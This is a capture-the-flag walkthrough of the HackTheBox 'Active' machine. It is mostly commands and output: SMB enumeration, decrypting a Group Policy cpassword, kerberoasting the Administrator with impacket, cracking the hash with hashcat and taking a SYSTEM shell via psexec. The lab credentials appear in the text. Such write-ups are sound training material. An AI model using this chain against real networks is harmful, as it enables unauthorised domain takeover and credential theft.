Active

An easy WIndows box from HackTheBox, find creds intside of an smb share and use those to kerberoast the administrators credentials, crack them with hashcat and get root.

Recon

Running the usual nmap

georgy@pop-os:~/Documents/htb/active$ sudo nmap -sC -sV -Pn -oA nmap/init 10.10.10.100

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-10-06 00:54:33Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

The default script reveals the domain name, active.htb, add it to the /etc/hosts file

Run an LDAPsearch, don’t find anything we don’t know

georgy@pop-os:~/Documents/htb/active$ ldapsearch -H ldap://active.htb -x -s basenamingcontexts

# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
currentTime: 20221006010634.0Z
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=active,DC=htb
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN
 =Sites,CN=Configuration,DC=active,DC=htb
namingContexts: DC=active,DC=htb
namingContexts: CN=Configuration,DC=active,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=active,DC=htb
namingContexts: DC=DomainDnsZones,DC=active,DC=htb
namingContexts: DC=ForestDnsZones,DC=active,DC=htb
defaultNamingContext: DC=active,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=active,DC=htb
configurationNamingContext: CN=Configuration,DC=active,DC=htb
...

Now try to enumerate further without using a password with rpcclient, but empty password / user doesn’t work

georgy@pop-os:~/Documents/htb/active$ rpcclient -U '' -N 10.10.10.100
rpcclient $> enumdomusers
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED

Moving on to trying SMB

georgy@pop-os:~/Documents/htb/active$ smbclient -L \\\\10.10.10.100
Password for [WORKGROUP\georgy]:
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	Replication     Disk      
	SYSVOL          Disk      Logon server share 
	Users           Disk

Get access with anonymous user!

Lets poke around with smbclient

georgy@pop-os:~/Documents/htb/active$ smbclient \\\\10.10.10.100\\Replication

And find a few interesting files inside, notably Groups.xml which has a user and password inside!

Exploitation

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

The user is plaintext as “SVC_TGS”, look around online how to decrypt the “cpassword”, and find this tool called gpp-decrypt, the git repo seems to run into pycrypt dependency issues, so install it using the kali repositories with “sudo apt install gpp-decrypt”

georgy@pop-os:~/Documents/htb/active$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

GPPstillStandingStrong2k18

Now we have a user and a password, lets see if we can get shell

psexec doesnt work

georgy@pop-os:/opt/impacket/examples$ python3 psexec.py SVC_TGS@10.10.10.100

Password:
[*] Requesting shares on 10.10.10.100.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'Replication' is not writable.
[-] share 'SYSVOL' is not writable.
[-] share 'Users' is not writable.

evil-winrm doesn’t work either unfortunately

Lets try to just kerberoast, and it works!

georgy@pop-os:/opt/impacket/examples$ python3 GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -outputfile ~/Documents/htb/active/hash

georgy@pop-os:/opt/impacket/examples$ cat ~/Documents/htb/active/spns.txt 
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f599568423143bf9d81235362108d987$06663eddd3990b0675e76076e8fcf2026d76f7d39b9adfbae32af61f3034cdcfad22b0aa8a61d04fa58f276aa58f1e08f2fe9d62953270630d2fd599b9a1bb810dde2cc0f589470b58c361a8d71f0cde28240039b8b9b65b6ae43a57aee302293cbe6c6327c5c9e796d8a62700dd2d0e988fe5e31bb44fd113701985d965caf90b5cef5f36184183c569fc63bd5553be032f3c341da2bfbb5c7e126792336392af6b51423c9ee0e2c33d8ffd4390dae30b4be427179c8eda41142784b903d7eaa8f77d5a46c83a60365d8c2e25ae93f35f7e129042e97a961f5f1d46772bf57b16725f0cdf15770a001e5b145647d2b5ab6eeaba4f9600be1dab00dbbf4c0a7e3a70dcf7528dfc9b7c1531479ad95b702a9ee770faf00f9924a42aca1e5371fe28921c345f87d3e167f33930f2b6c88dc359d4f49fc190ca92e2d2aeb8ede920785b234820d11af69f4bb68bca7c9ba3b9605286a877187a15e2b72e54f4ab533eaa2f1799c8b3430e5c08fcae44b41ffd32db25fd1b228277b245e33bdcec8f1150a5b6f274c4cdfcb18d295a44d5effeea3651c8f8e0f6b4a77e7532e43bebceb8a5be672770c1438e77c281fcee56a2533bccc348715b61f577b687b738f970bf2ce0b04fb1a0bda7ec8a28d10143e238e38548c7a5b41c783718d0849bcafbc624f02eaf41275ed0e0d369c079b5c26f0aa15b176863c13fcd99b602fc5161fb7251d6fcafbb3057035081a3c82ea347e45fb676c861c517908dc2742bbceb077662d19bb32b2d84dd743781b5db05abcb9cb9405ca347dab224f35dcf8f994e9bf0666194ed9c601d6f7a679553a3f1d60ee49492e0c002760639ee886555cc69bc5492e47852718a86cad62349000969cb0680616bcab852fa8bed144783aef3c3deee6eadaf099f485a1fa1355753052de1be0f616e6cdadb633c1c56fbe52a20f9df7cabfbb0a56a2d16604522a5e842b6e04f46ad4fb2f1d081627a1107d4d4c7b22764c002c3cd7eef23f29c03f7c9352520af4dc532366f3e486c854a458c953a4450034bd3caf8b4dc0172cb0b9d98a393642568097dd421afe628837633951a7e2c639d59996ce0e909faf0ea1e25a77cb62ed32d2dc170c6b59a188287f9b9616e8eaf9bcba282f76edab268560d96cf34df793f571f407f904c76c46f8d86a2d83bb2bbede62ad22cef75c47a1e675cf05ebf8eda89f9cc2a0f2ee4ae739fc949c13312706a784b4a85abae1fe3cc0728f0ca

Now to crack it with hashcat, and get a password!

georgy@pop-os:~/Documents/htb/active$ hashcat -m 13100 hash /opt/seclists/Passwords/Leaked-Databases/rockyou.txt

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$f599568423143bf9d81235362108d987$06663eddd3990b0675e76076e8fcf2026d76f7d39b9adfbae32af61f3034cdcfad22b0aa8a61d04fa58f276aa58f1e08f2fe9d62953270630d2fd599b9a1bb810dde2cc0f589470b58c361a8d71f0cde28240039b8b9b65b6ae43a57aee302293cbe6c6327c5c9e796d8a62700dd2d0e988fe5e31bb44fd113701985d965caf90b5cef5f36184183c569fc63bd5553be032f3c341da2bfbb5c7e126792336392af6b51423c9ee0e2c33d8ffd4390dae30b4be427179c8eda41142784b903d7eaa8f77d5a46c83a60365d8c2e25ae93f35f7e129042e97a961f5f1d46772bf57b16725f0cdf15770a001e5b145647d2b5ab6eeaba4f9600be1dab00dbbf4c0a7e3a70dcf7528dfc9b7c1531479ad95b702a9ee770faf00f9924a42aca1e5371fe28921c345f87d3e167f33930f2b6c88dc359d4f49fc190ca92e2d2aeb8ede920785b234820d11af69f4bb68bca7c9ba3b9605286a877187a15e2b72e54f4ab533eaa2f1799c8b3430e5c08fcae44b41ffd32db25fd1b228277b245e33bdcec8f1150a5b6f274c4cdfcb18d295a44d5effeea3651c8f8e0f6b4a77e7532e43bebceb8a5be672770c1438e77c281fcee56a2533bccc348715b61f577b687b738f970bf2ce0b04fb1a0bda7ec8a28d10143e238e38548c7a5b41c783718d0849bcafbc624f02eaf41275ed0e0d369c079b5c26f0aa15b176863c13fcd99b602fc5161fb7251d6fcafbb3057035081a3c82ea347e45fb676c861c517908dc2742bbceb077662d19bb32b2d84dd743781b5db05abcb9cb9405ca347dab224f35dcf8f994e9bf0666194ed9c601d6f7a679553a3f1d60ee49492e0c002760639ee886555cc69bc5492e47852718a86cad62349000969cb0680616bcab852fa8bed144783aef3c3deee6eadaf099f485a1fa1355753052de1be0f616e6cdadb633c1c56fbe52a20f9df7cabfbb0a56a2d16604522a5e842b6e04f46ad4fb2f1d081627a1107d4d4c7b22764c002c3cd7eef23f29c03f7c9352520af4dc532366f3e486c854a458c953a4450034bd3caf8b4dc0172cb0b9d98a393642568097dd421afe628837633951a7e2c639d59996ce0e909faf0ea1e25a77cb62ed32d2dc170c6b59a188287f9b9616e8eaf9bcba282f76edab268560d96cf34df793f571f407f904c76c46f8d86a2d83bb2bbede62ad22cef75c47a1e675cf05ebf8eda89f9cc2a0f2ee4ae739fc949c13312706a784b4a85abae1fe3cc0728f0ca:Ticketmaster1968

Get the creds!

Administrator:Ticketmaster1968

Lets try psexec to get a shell

georgy@pop-os:/opt/impacket/examples$ python3 psexec.py Administrator@10.10.10.100
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file ruxPYfYS.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service OKpc on 10.10.10.100.....
[*] Starting service OKpc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>

Active

Recon #

Exploitation #

Recon

Exploitation